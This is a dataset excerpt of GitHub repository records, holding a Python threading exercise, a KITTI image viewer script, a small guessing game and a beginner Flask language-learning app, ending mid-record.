br.leaderSem\n self.partnerSem = br.followerSem\n else: #follower wait\n self.arrivedSem = br.followerSem\n self.partnerSem = br.leaderSem\n #def set_partner(dancer):\n #self.partner=dancer\n\n def __repr__(self): #prints out the dancer and the number associated with them\n return self.type+\" \"+str(self.num)\n \n def dance(self):\n global br\n dancing_time = rand.random()\n while(1):\n dance_queue.append(self.type, self.waitingSem)\n self.waitingSem.acquire()\n enter()\n if br.music_on == False: #see if dancing can begin\n break\n print(self.type+\" \"+ str(self.num) + \" entering floor\")\n\n if self.type == \"Leader\":\n self.partnerSem.acquire()\n pair[0]=self\n self.arrivedSem.release()\n if pair[0] and pair[1]:\n print(\"Leader \"+ str(pair[0].num) + \" and Follower \" + str(pair[1].num) + \" are dancing.\")\n #print(pair[0]+ \" and \" + pair[1] + \" are dancing.\")\n dance_queue.pop()\n else: \n pair[1]=self\n self.arrivedSem.release()\n self.partnerSem.acquire()\n sleep(dancing_time)\n line_up()#line back up \n print(self.type+\" \"+ str(self.num)+ \" is getting back in line.\")\n\ndef start_music(dance):\n print(\"\\n** Band Leader started playing \" + dance + \" **\")\n open_floor()\ndef end_music(dance):\n close_floor()\n print(\"** Band Leader stopped playing \" + dance + \" **\\n\")\n\n#dj changes music and opens/closes the dance floor\ndef dj_thread():\n dance_queue.pop() #get first pair released for dance\n for dance in cycle(br.music_list):\n start_music(dance)\n sleep(br.song_time)\n end_music(dance)\n#d = dj()\n\nif __name__ == '__main__':\n \n # dj\n dj = Thread(target= dj_thread)\n leaders_array =[]\n followers_array = []\n dancing_time = rand.random()\n dancer_array = []\n\n for i in range(num_leaders):\n l = Dancer(i,\"Leader\")\n dancer_array.append(l)\n leaders_array.append(Thread(target = l.dance))\n #leaders_array.append(Thread(target = l.dance, args=(l,)))\n leaders_array[i].start()\n\n for i in range(num_followers):\n f = Dancer(i,\"Follower\")\n dancer_array.append(f)\n followers_array.append(Thread(target = f.dance))\n #followers_array.append(Thread(target = f.dance, args=(f,)))\n followers_array[i].start()\n\n dj.start()\n dj.join()\n #sleep(dancing_time)\n br.music_on = False\n open_floor()\n for dancer in dancer_array:\n dancer.waitingSem.release()\n for i in range(0, num_leaders):\n leaders_array[i].join()\n for i in range(0, num_followers):\n followers_array[i].join()\n" } ]
6
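The dining-philosophers file in the record above caps its "footman" semaphore at one less than the number of philosophers, which is the whole trick: with at most N-1 diners seated at once, someone can always pick up both forks. A minimal, self-contained sketch of that multiplex pattern (all names here are illustrative, not taken from the repo):

```python
# Footman multiplex: admit at most N-1 philosophers to the table at once,
# so the circular-wait condition required for deadlock can never complete.
from threading import Semaphore, Thread

N = 5
forks = [Semaphore(1) for _ in range(N)]
footman = Semaphore(N - 1)

def dine(i, meals=3):
    left, right = forks[i], forks[(i + 1) % N]
    for _ in range(meals):
        footman.acquire()
        right.acquire()   # same right-then-left order as the repo's get_forks
        left.acquire()
        # eat
        left.release()
        right.release()
        footman.release()

threads = [Thread(target=dine, args=(i,)) for i in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

Because the footman admits at most N-1 diners, at least one admitted philosopher always finds both of its forks free, so the program terminates without deadlock regardless of scheduling.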
jingzhao3200/deeplabv3_cv_project
https://github.com/jingzhao3200/deeplabv3_cv_project
3a287d9d76174ca48f964a3a51b3d5da26bb936e
e94b9dde23bad769a011aea71df639111e3abed5
1f7c17a814537e4c5d91eec049fabb56b9e92d9a
refs/heads/master
2020-05-18T08:40:31.479804
2019-05-02T14:52:22
2019-05-02T14:52:22
184,301,976
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7126696705818176, "alphanum_fraction": 0.733031690120697, "avg_line_length": 22.157894134521484, "blob_id": "cdc2d4f5618beea53847886148f0ddc72c832ae3", "content_id": "b4c3c4444553132dde37c25d4c67ee5ff940c4a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 442, "license_type": "permissive", "max_line_length": 97, "num_lines": 19, "path": "/kitti/devkit_semantics/devkit/prepare.py", "repo_name": "jingzhao3200/deeplabv3_cv_project", "src_encoding": "UTF-8", "text": "import scipy.misc as sp\nimport matplotlib.pyplot as plt\n\nimport os\nos.chdir('../../data_semantics/training/')\nprint (os.getcwd())\n\n# reading the instance and semantic segmentation ground truth from the combined ground truth file\n\nimageName = '000000_10'\nim = sp.imread('image_2/'+imageName+'.png')\nplt.imshow(im)\nplt.show()\n\nsemantic_gt = sp.imread('semantic/'+imageName+'.png')\nplt.imshow(semantic_gt)\nplt.show()\n\nprint(semantic_gt.shape)\n\n\n" } ]
1
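Note that prepare.py in this record reads the KITTI ground truth with `scipy.misc.imread`, which was deprecated and then removed in SciPy 1.2, so the script no longer runs on a current stack. A hedged sketch of the same visualization using imageio as the usual drop-in replacement (same repo paths assumed; on older imageio releases use `import imageio` directly instead of the `v2` namespace):

```python
# Equivalent of the repo's prepare.py on a modern stack: imageio replaces
# the removed scipy.misc.imread; everything else is unchanged.
import imageio.v2 as imageio
import matplotlib.pyplot as plt

imageName = '000000_10'

im = imageio.imread('image_2/' + imageName + '.png')
plt.imshow(im)
plt.show()

semantic_gt = imageio.imread('semantic/' + imageName + '.png')
plt.imshow(semantic_gt)
plt.show()

print(semantic_gt.shape)
```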
cl-dec/Find-the-Good-Boy
https://github.com/cl-dec/Find-the-Good-Boy
d94b26cb3602f4e6756715b6a8c8f06f4c87c7a2
492317d589722488d318cd5b22bc9c7f94cf18fd
c9a8a79948917b176bc784b54418391d8787595a
refs/heads/main
2023-01-09T20:05:04.776522
2020-11-11T04:14:33
2020-11-11T04:14:33
310,729,761
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7571116089820862, "alphanum_fraction": 0.7702407240867615, "avg_line_length": 49.66666793823242, "blob_id": "965986cb63ab533da8045f1e7ed4ba2a2548c508", "content_id": "665b1c3aa011f14d400b4ddf75ac645c61411456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 457, "license_type": "no_license", "max_line_length": 231, "num_lines": 9, "path": "/README.md", "repo_name": "cl-dec/Find-the-Good-Boy", "src_encoding": "UTF-8", "text": "Find the Good Boy: The Python Text Game\n\nIn Find the Good Boy, the user must input a value from a list given to them until they guess the answer correctly. The correct answer is randomly generated from the elements in the list and is different every time the game is run. \n\nThe object of the game is to find the user's dog who is trapped somewhere in the house. \nInspired by Loki, the cat trapped in the drawer.\n\nGame created by: Annastasia Fultz \nNovember 10, 2020 \n" }, { "alpha_fraction": 0.7066666483879089, "alphanum_fraction": 0.7066666483879089, "avg_line_length": 62.28571319580078, "blob_id": "d0502d61b7dbc5d0cbaf63448e59c51a2e2d2371", "content_id": "5d3e01a01a384f23e29f6dcaba757083678c5495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1350, "license_type": "no_license", "max_line_length": 301, "num_lines": 21, "path": "/game.py", "repo_name": "cl-dec/Find-the-Good-Boy", "src_encoding": "UTF-8", "text": "# Every time the game is run, the dog will be assigned to a room location randomly.The user will be given a list of rooms to pick from until the dog is found. When the mission is complete, the user recieves a congratulation message. However, if the user guesses wrong, they will be asked to try again.\r\n\r\nimport random\r\n#rooms to pick from\r\nrooms = (\" KITCHEN\", \" BATHROOM\", \" OFFICE\", \" DEN\", \" BASEMENT\", \" CLOSET\")\r\ndog = random.choice(rooms)\r\nprint(\"You are doing your homework when you hear your dog whimpering from somewhere downstairs. Figuring that he accidentally locked himself out when running out the back door, but he wasn't outside. It's now your mission to find him before your parents come home.\")\r\nprint(\"Directions:\")\r\nprint(\"When prompted, choose a room from the list to check in first. Continue searching through the house until you find him. But remember: he may never hide in the same place twice.\")\r\nprint(\"Choose a room: kitchen, bathroom, closet, den, basement, or office.\")\r\n\r\nwhile True:\r\n rooms = (\" KITCHEN\", \" BATHROOM\", \" OFFICE\", \" DEN\", \" BASEMENT\", \" CLOSET\")\r\n dog = random.choice(rooms)\r\n guess = input(\"Please choose a direction\")\r\n guess = guess.upper()\r\n if guess in dog:\r\n print(\"Congratulations! You found the good boy!\")\r\n break\r\n else:\r\n print(\"Please guess again.\")\r\n" } ]
2
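game.py above accepts any input and tests it with `guess in dog`, a substring match against a room name padded with a leading space, so a partial answer like "kit" also wins. A stricter sketch of the same guess loop that validates input against the room list first (an illustrative rewrite, not the repo's code):

```python
# Tighter variant of the game loop: normalize input, reject non-rooms,
# and require an exact match before declaring victory.
import random

ROOMS = ("KITCHEN", "BATHROOM", "OFFICE", "DEN", "BASEMENT", "CLOSET")
dog = random.choice(ROOMS)

while True:
    guess = input("Please choose a room: ").strip().upper()
    if guess not in ROOMS:
        print("That's not a room in the house.")
        continue
    if guess == dog:
        print("Congratulations! You found the good boy!")
        break
    print("Please guess again.")
    dog = random.choice(ROOMS)  # re-hide, mirroring the original's re-roll each turn
```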
DanielSherlock/LLADI
https://github.com/DanielSherlock/LLADI
82a0f32b1d40ca1c1a2f6b4d0a80420be4495628
3b24f9b01b07eaead8aa64b409cdd828167044b0
df2c7953399a4f782c37723e2235b9f229e3cb59
refs/heads/master
2021-01-21T16:57:10.637311
2015-01-05T23:43:22
2015-01-05T23:43:22
28,831,843
1
0
null
2015-01-05T21:08:16
2014-12-29T19:08:17
2014-12-29T19:08:17
null
[ { "alpha_fraction": 0.7903226017951965, "alphanum_fraction": 0.7903226017951965, "avg_line_length": 30, "blob_id": "388c16fff13686ebb8b603aaacdcd346e64b7103", "content_id": "e67bc3238971c96ca8f5bb0f36d58f7d59fd294d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/LLADI/database/__init__.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from .users import User, new_user\nfrom .follows import Follow\n" }, { "alpha_fraction": 0.5581497550010681, "alphanum_fraction": 0.5665197968482971, "avg_line_length": 30.971830368041992, "blob_id": "aa457165feb0d0855a93de648b956d3bc03b1d39", "content_id": "a77e2d81c19a73adf55cfc73b7e815e5fc2be8e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "no_license", "max_line_length": 120, "num_lines": 71, "path": "/LLADI/database/users.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nimport base64\nfrom time import strftime, gmtime\nfrom . import follows\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass User():\n def __init__(self, uuid=0, username=\"\"):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if uuid:\n cur.execute('SELECT * FROM \"User\" WHERE \"UUID\" LIKE ?', (uuid,))\n elif username:\n cur.execute('SELECT * FROM \"User\" WHERE \"Username\" LIKE ?', (username,))\n data = cur.fetchone()\n if data:\n self.exists = True\n self.uuid = data[0]\n self.username = data[1]\n self.password = data[2]\n self.display_name = data[3]\n self.picture = data[4]\n self.date = data[5]\n self.follows = follows.Follow(follower=self.uuid).data\n self.followed_by = follows.Follow(followee=self.uuid).data\n cur.execute('SELECT \"Key UKID\", \"Knowledge\" FROM \"Key Knowledge\" WHERE \"User UUID\" LIKE ?', (self.uuid,))\n self.keys = {}\n for key in cur.fetchall():\n self.keys[key[0]] = key[1]\n print(self.keys)\n else:\n self.exists = False\n conn.close()\n\n def __del__(self):\n pass\n\n\ndef search_user(search):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UUID\" FROM \"User\" WHERE \"Display Name\" LIKE ?', (\"%\" + search + \"%\",))\n data = cur.fetchall()\n conn.close()\n ret = []\n for suser in data:\n ret.append(User(int(suser[0])))\n return ret\n\n\ndef new_user(username, password, display_name):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into User('Username', 'Password', 'Display Name', 'Creation Date') VALUES(?, ?, ?, ?)\",\n (username, password, display_name, date))\n conn.commit()\n conn.close()\n\n\ndef get_tier_knowledge(course, user):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"Tier\" FROM \"Tier Knowledge\" WHERE \"Course UCID\" LIKE ? 
AND \"User UUID\" LIKE ?', (course, user))\n data = cur.fetchone()\n conn.close()\n if not data:\n return 0\n return data[0]\n" }, { "alpha_fraction": 0.5210191011428833, "alphanum_fraction": 0.5318471193313599, "avg_line_length": 41.4594612121582, "blob_id": "d687f78f9e0e0ac9f6aa47cb2f0188dce45a14fa", "content_id": "78f865ffbdacf619863ebac3c2deab22c9d56cd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1570, "license_type": "no_license", "max_line_length": 116, "num_lines": 37, "path": "/templates/page/course.html", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "<div class=\"container\">\n <h3>{{ course.course_name }}</h3>\n\n <div class=\"container col-md-8 well\">\n {% for lesson in lessons %}\n <a href=\"/lesson/{{ lesson.ulid }}\" class=\"btn btn-default\" style=\"margin:5px;\" {% if lesson.tier>\n tier+1%}disabled{% endif %}>{{ lesson.name }}\n </a>\n {% endfor %}\n {% if logged.uuid == owner.uuid %}\n <br>\n <a class=\"btn btn-info clearfix\" href=\"/create/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Create a\n Lesson</a>\n <a class=\"btn btn-info clearfix\" href=\"/edit/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Edit a\n Lesson</a>\n {% endif %}\n {% for contributor in contributors %}\n {% if logged.uuid == contributor.uuid %}\n <br>\n <a class=\"btn btn-info clearfix\" href=\"/create/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Create a\n Lesson</a>\n <a class=\"btn btn-info clearfix\" href=\"/edit/course/{{ course.ucid }}/lesson\" style=\"margin:5px;\">Edit a\n Lesson</a>\n {% endif%}\n {% endfor %}\n </div>\n <div class=\"container col-md-3 col-md-offset-1 well\">\n <h4>Contributors</h4>\n <ul class=\"list-unstyled\">\n <li><h5><strong><a href=\"/user/{{ owner.uuid }}\">{{ owner.display_name }}</a></strong></h5></li>\n {% for contributor in contributors %}\n <li><h5><a href=\"/user/{{ contributor.uuid }}\">{{ contributor.display_name }}</a></h5></li>\n {% endfor %}\n\n </ul>\n </div>\n</div>" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 21.75, "blob_id": "3990714bf94e1d05ac1049687e890ecf05114578", "content_id": "29f34890d6f3f443aed7d9005a73bf427cd719f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/LLADI/functions/__init__.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "__author__ = 'Sam'\n\nfrom .login import log_in, valid_login\nfrom .users import current_user" }, { "alpha_fraction": 0.6908212304115295, "alphanum_fraction": 0.6908212304115295, "avg_line_length": 22, "blob_id": "dacf27dfc0bb9ae2c8de7678bb46dae0179cacd0", "content_id": "53bcd93ae8459ffb966eeb8faba73cd25acab1d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/LLADI/functions/users.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from flask import session, request\nfrom LLADI.database import users\n\n\ndef current_user():\n if 'username' in session:\n return users.User(username=session['username'])\n else:\n return False\n" }, { "alpha_fraction": 0.7409326434135437, "alphanum_fraction": 0.7409326434135437, "avg_line_length": 28.769229888916016, "blob_id": "a05efedc98f00207199c970ac3030dd1bfb77c18", 
"content_id": "355983c3ce4437f463e90ebdc884774a5c77241f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/LLADI/functions/register.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from passlib.apps import custom_app_context as pwd_context\nfrom LLADI.database import users\n\n\ndef register_user(username, password, display_name):\n users.new_user(username, pwd_context.encrypt(password), display_name)\n\ndef validate_register(username):\n duplicate_user = users.User(username=username)\n if duplicate_user.exists:\n return False\n else:\n return True" }, { "alpha_fraction": 0.616356372833252, "alphanum_fraction": 0.6203457713127136, "avg_line_length": 33.97674560546875, "blob_id": "2c6920879da67f32552d3647506ffaf2f9071732", "content_id": "237e256949fc66f235b35c7c2151f6301bb1f6ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 124, "num_lines": 43, "path": "/LLADI/database/follows.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Follow():\n def __init__(self, follower=None, followee=None, ufid=None):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n\n if follower:\n cur.execute('SELECT \"Followee\" FROM \"Follow\" WHERE \"Follower\" LIKE ?', (int(follower),))\n elif followee:\n cur.execute('SELECT \"Follower\" FROM \"Follow\" WHERE \"Followee\" LIKE ?', (int(followee),))\n elif ufid:\n cur.execute('SELECT * FROM \"Follow\" WHERE \"UFID\" LIKE ?', (int(ufid),))\n self.data = cur.fetchall()\n\n\ndef new_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Follow('Follower', 'Followee', 'Follow Date') VALUES(?, ?, ?)\",\n (int(follower), int(followee), date))\n conn.commit()\n conn.close()\n\n\ndef remove_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('DELETE FROM \"Follow\" WHERE \"Follower\" LIKE ? AND \"Followee\" LIKE ?', (int(follower), int(followee)))\n conn.commit()\n conn.close()\n\ndef get_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UFID\" FROM \"Follow\" WHERE \"Follower\" LIKE ? 
AND \"Followee\" LIKE ?', (int(follower), int(followee)))\n data = cur.fetchone()\n return data[0]\n" }, { "alpha_fraction": 0.45548489689826965, "alphanum_fraction": 0.4848966598510742, "avg_line_length": 42.41379165649414, "blob_id": "33ca663c728b94fc1cbfc1a565dc6122e0e1c4a2", "content_id": "506c759946c634643290b8320e09ac7d32f41d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/LLADI/functions/feeds.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from LLADI.database import users\nfrom LLADI.database import follows\n\n\ndef create_feed(user):\n feed = []\n for nusers in user.follows:\n fusers = users.User(nusers[0])\n feed.append({\n \"date\": \"{}-{}-{} {}:{}:{}\".format(str(fusers.date)[:4], fusers.date[4:6], fusers.date[6:8],\n fusers.date[8:10], fusers.date[10:12], fusers.date[12:14]),\n \"title\": fusers.display_name + \" created their account\",\n \"body\": \"\",\n \"link\": \"/user/\" + str(fusers.uuid),\n })\n for nuser_follows in fusers.follows:\n date = follows.Follow(ufid=follows.get_follow(fusers.uuid, nuser_follows[0])).data[0][3]\n follow_target = users.User(nuser_follows[0]).display_name\n if follow_target == user.display_name:\n follow_target = \"you\"\n feed.append({\n \"date\": \"{}-{}-{} {}:{}:{}\".format(date[:4], date[4:6], date[6:8], date[8:10], date[10:12],\n date[12:14]),\n \"title\": fusers.display_name + \" followed \" + follow_target,\n \"body\": \"\",\n \"link\": \"/user/\" + str(fusers.uuid),\n })\n\n return feed" }, { "alpha_fraction": 0.7314578294754028, "alphanum_fraction": 0.7314578294754028, "avg_line_length": 25.066667556762695, "blob_id": "266e6d3b0cb8993dcc9fa4d33e8ce8f859f5fad6", "content_id": "85b9dda82dbdce9a27a4b803631d6c822cb04ac8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 66, "num_lines": 15, "path": "/LLADI/functions/login.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from passlib.apps import custom_app_context as pwd_context\nfrom flask import session\nfrom LLADI.database import users\n\n\ndef valid_login(username, password):\n request_user = users.User(username=username)\n if request_user.exists:\n return pwd_context.verify(password, request_user.password)\n else:\n return False\n\n\ndef log_in(username):\n session['username'] = username\n" }, { "alpha_fraction": 0.6235032677650452, "alphanum_fraction": 0.6250482797622681, "avg_line_length": 37.93608856201172, "blob_id": "9f494d3370cf535023ee3eccbd922a2aaf4e0b13", "content_id": "0dc3d2c60b2803ecfc522467eae647aa8c15c219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10356, "license_type": "no_license", "max_line_length": 120, "num_lines": 266, "path": "/routes.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, session, redirect, url_for\nfrom LLADI.database import users, follows, courses, lessons\nfrom LLADI.functions.login import valid_login, log_in\nfrom LLADI.functions.users import current_user\nfrom LLADI.functions.register import register_user, validate_register\nfrom LLADI.functions.follow import validate_follow\nfrom LLADI.functions.feeds import create_feed\nimport base64\n\nimport re\n\napp = Flask(__name__)\n\n\[email 
protected]('/')\ndef home():\n cu = current_user()\n page = render_template('page/welcome.html')\n return render_template('global/frame.html', content=page, page=\"home\", logged=cu)\n\n\[email protected]('/login/', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n if 'username' not in request.cookies:\n if valid_login(request.form['loginUsername'], request.form['loginPassword']):\n log_in(request.form['loginUsername'])\n if request.args.get('next'):\n return redirect(request.args.get('next'))\n else:\n return redirect(url_for('home'))\n else:\n if request.args.get('next'):\n return redirect(url_for('login') + '?failed=1&next=' + request.args.get('next'))\n else:\n return redirect(url_for('login') + '?failed=1')\n else:\n return redirect(request.args.get('next'))\n else:\n cu = current_user()\n failure = request.args.get('failed')\n page = render_template('page/login.html', failure=failure)\n return render_template('global/frame.html', content=page, page=\"login\", logged=cu)\n\n\[email protected]('/logout/', methods=['GET'])\ndef logout():\n session.pop('username')\n if request.args.get('next'):\n return redirect(request.args.get('next'))\n else:\n return redirect(url_for('home'))\n\n\[email protected]('/register/', methods=['GET', 'POST'])\ndef register():\n if request.method == \"POST\":\n register_username = request.form['registerUsername']\n register_password = request.form['registerPassword']\n register_repeat_password = request.form['registerRepeatPassword']\n register_display_name = request.form['registerDisplayName']\n errors = []\n if len(register_username) < 8:\n errors.append('username_length')\n if len(register_password) < 8:\n errors.append('password_length')\n if len(register_display_name) == 0:\n errors.append('display_name_length')\n if len(re.findall('(^\\s+|\\s\\s+|\\s+$)', register_display_name)) != 0:\n errors.append('display_name_whitespace')\n if register_password != register_repeat_password:\n errors.append('password_no_match')\n if not validate_register(register_username):\n errors.append('username_already_exists')\n query_string = \"?\"\n for error in errors:\n query_string += error + \"=1&\"\n query_string.strip(\"&\")\n if len(errors):\n return redirect(url_for('register') + query_string)\n else:\n register_user(register_username, register_password, register_display_name)\n return redirect(url_for('home'))\n else:\n errors = []\n if request.args.get('username_length'):\n errors.append('username_length')\n if request.args.get('password_length'):\n errors.append('password_length')\n if request.args.get('display_name_length'):\n errors.append('display_name_length')\n if request.args.get('display_name_whitespace'):\n errors.append('display_name_whitespace')\n if request.args.get('password_no_match'):\n errors.append('password_no_match')\n if request.args.get('username_already_exists'):\n errors.append('username_already_exists')\n page = render_template('page/register.html', errors=errors)\n cu = current_user()\n return render_template('global/frame.html', content=page, page=\"register\", logged=cu)\n\n\[email protected]('/user/<userid>')\ndef user(userid):\n cu = current_user()\n pu = users.User(uuid=userid)\n user_follows = []\n user_followed_by = []\n if len(pu.follows):\n for followed_user in pu.follows:\n user_follows.append(users.User(uuid=followed_user[0]))\n if len(pu.followed_by):\n for followed_user in pu.followed_by:\n user_followed_by.append(users.User(uuid=followed_user[0]))\n following = \"no_follow\"\n if cu:\n following = 
\"False\"\n for check_user in user_followed_by:\n if check_user.uuid == cu.uuid:\n following = \"True\"\n page = render_template('page/userpage.html', user=pu, logged=cu, follows=user_follows, followed_by=user_followed_by,\n following=following)\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n\[email protected]('/user/', methods=['GET', 'POST'])\ndef user_search():\n if request.method == \"POST\":\n results = users.search_user(request.form['searchUser'])\n cu = current_user()\n page = render_template('page/usersearch.html', results=results)\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n else:\n cu = current_user()\n page = render_template('page/usersearch.html')\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n\[email protected]('/course/', methods=['GET', 'POST'])\ndef course_search():\n if request.method == \"POST\":\n results = courses.search_course(request.form['searchCourse'])\n cu = current_user()\n page = render_template('page/coursesearch.html', results=results)\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n else:\n cu = current_user()\n page = render_template('page/coursesearch.html')\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/follow/', methods=['GET', 'POST'])\ndef follow():\n follower = current_user().uuid\n followee = users.User(uuid=request.form['followee']).uuid\n if validate_follow(follower, followee):\n follows.new_follow(follower, followee)\n return redirect(request.args.get('next'))\n\n\[email protected]('/unfollow/', methods=['GET', 'POST'])\ndef unfollow():\n follower = current_user().uuid\n followee = users.User(uuid=request.form['followee']).uuid\n follows.remove_follow(follower, followee)\n return redirect(request.args.get('next'))\n\n\[email protected]('/feed/')\ndef feed():\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + url_for('feed'))\n feed = create_feed(cu)\n feed.sort(key=lambda x: x['date'], reverse=True)\n page = render_template('page/feed.html', feed=feed)\n return render_template('global/frame.html', content=page, page=\"feed\", logged=cu)\n\n\[email protected]('/course/<courseid>')\ndef course(courseid):\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n course_page = courses.Course(ucid=courseid)\n course_owner = users.User(uuid=course_page.owner)\n contributor_uuids = courses.get_contributors(courseid)\n lessons = courses.get_lessons(courseid)\n tier = users.get_tier_knowledge(courseid, cu.uuid)\n contributors = []\n for entry in contributor_uuids:\n contributors.append(users.User(uuid=entry))\n page = render_template('page/course.html', course=course_page, owner=course_owner, contributors=contributors,\n lessons=lessons, tier=tier, logged=cu)\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/lesson/')\ndef lesson_redirect():\n return redirect(url_for('course_search'))\n\n\[email protected]('/create/course/', methods=['GET', 'POST'])\ndef create_course():\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n if request.method == \"POST\":\n create_course_name = request.form['createCourseName']\n create_course_owner = cu.uuid\n create_course_picture = 
str(base64.encodebytes(request.files['createCoursePicture'].stream.read())).strip(\n            \"b'\").strip(\"'\").replace(\"\\\\n\", \"\\n\")\n        errors = []\n        if len(create_course_name) < 3:\n            errors.append('course_name_length')\n        if request.files['createCoursePicture'].filename.split(\".\")[-1] != \"png\":\n            errors.append('image_type')\n        if courses.Course(course_name=create_course_name).exists:\n            errors.append('course_name_unique')\n        query_string = \"?\"\n        for error in errors:\n            query_string += error + \"=1&\"\n        query_string.strip(\"&\")\n        if len(errors):\n            return redirect(url_for('create_course') + query_string)\n        return redirect(\n            \"/course/\" + str(courses.create_course(create_course_name, create_course_owner, create_course_picture)))\n    else:\n        errors = []\n        if request.args.get('course_name_length'):\n            errors.append('course_name_length')\n        if request.args.get('image_type'):\n            errors.append('image_type')\n        if request.args.get('course_name_unique'):\n            errors.append('course_name_unique')\n        page = render_template('page/createcourse.html', errors=errors)\n        return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\n@app.route('/create/course/<courseid>/lesson/')\ndef create_lesson(courseid):\n    cu = current_user()\n    if not cu:\n        return redirect(url_for('login') + \"?next=\" + request.url)\n    cc = courses.Course(ucid=courseid)\n    if cu.uuid != cc.owner and str(cu.uuid) not in courses.get_contributors(cc.ucid):\n        return redirect(url_for('course', courseid=courseid))\n    page = 'lesson_creator'\n    return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\n@app.route('/lesson/<lessonid>')\ndef lesson(lessonid):\n    cu = current_user()\n    if not cu:\n        return redirect(url_for('login') + \"?next=\" + request.url)\n    page = \"hello\"\n    return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\n\nif __name__ == '__main__':\n    app.secret_key = '~\\xaa\\xaf\\xdf.\\xb8d\\xe6,\\xdd\\xfd\\x8eD[\\x94\\xaeQku\\xf6{\\xa0\\xd9a'\n    app.run(debug=True)" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 46.70000076293945, "blob_id": "98afac2354573706adfa10389f4cbd1af8d2ebe1", "content_id": "85d2c208beb78329b4618558ed695dca544f1f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 126, "num_lines": 10, "path": "/README.md", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "LLADI\n=====\n\nThe Language Learning Application Development Interface is an Online Tool developed by Samuel Blumire to\nfacilitate the free and open platform creation of Online, Language Learning Environments.\n\nThis version is modified so that it can be run on Daniel's computer:\n\n - I made a flask virtual python environment (.gitignore'd due to practicality reasons) in a folder called flask in LLADI repo\n - I have had to change a few of the paths (for example where the database is)" }, { "alpha_fraction": 